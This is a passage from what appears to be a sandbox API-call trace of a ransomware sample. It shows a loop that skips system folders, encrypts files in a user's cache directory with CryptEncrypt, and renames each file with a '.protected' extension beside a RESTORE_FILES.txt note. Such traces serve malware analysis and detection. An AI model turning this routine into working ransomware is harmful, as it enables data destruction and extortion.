pdwDataLen=0x295e794*=0x30) returned 1 [0089.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".rar") returned 0x0 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".zip") returned 0x0 [0089.054] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.054] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.054] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.054] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.055] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.055] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.055] CloseHandle (hObject=0x150) returned 1 [0089.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected") returned 162 [0089.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.protected")) returned 1 [0089.055] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0089.055] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Windows") returned -1 [0089.055] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files") returned -1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files (x86)") returned -1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="$Recycle.bin") returned 1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="System Volume Information") returned -1 [0089.056] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".protected") returned 0x0 [0089.056] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="RESTORE_FILES.txt") returned -1 [0089.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".rar") returned 0x0 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".zip") returned 0x0 [0089.056] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.057] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.057] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.057] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.057] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.057] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.057] CloseHandle (hObject=0x150) returned 1 [0089.057] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected") returned 162 [0089.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.protected")) returned 1 [0089.059] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Windows") returned -1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files") returned -1 [0089.059] lstrcmpiW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files (x86)") returned -1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="$Recycle.bin") returned 1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="System Volume Information") returned -1 [0089.059] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.059] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".protected") returned 0x0 [0089.059] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="RESTORE_FILES.txt") returned -1 [0089.059] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.059] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".rar") returned 0x0 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".zip") returned 0x0 [0089.060] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.061] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.061] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.061] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.061] CloseHandle (hObject=0x150) returned 1 [0089.061] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected") returned 162 [0089.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.protected")) returned 1 [0089.062] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Windows") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files (x86)") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="$Recycle.bin") returned 1 [0089.062] lstrcmpiW 
(lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="System Volume Information") returned -1 [0089.062] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.062] StrStrIW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".protected") returned 0x0 [0089.062] lstrcmpW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="RESTORE_FILES.txt") returned -1 [0089.062] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.062] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".rar") returned 0x0 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".zip") returned 0x0 [0089.063] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x180, lpOverlapped=0x0) returned 1 [0089.064] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x180, lpOverlapped=0x0) returned 1 [0089.064] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.064] CloseHandle (hObject=0x150) returned 1 [0089.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected") returned 162 [0089.064] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.protected")) returned 1 [0089.065] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Windows") returned -1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files") returned -1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files (x86)") returned -1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="$Recycle.bin") returned 1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="System Volume Information") returned -1 [0089.065] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".protected") returned 0x0 [0089.065] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="RESTORE_FILES.txt") returned -1 [0089.065] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.065] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0089.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".rar") returned 0x0 [0089.065] lstrlenW 
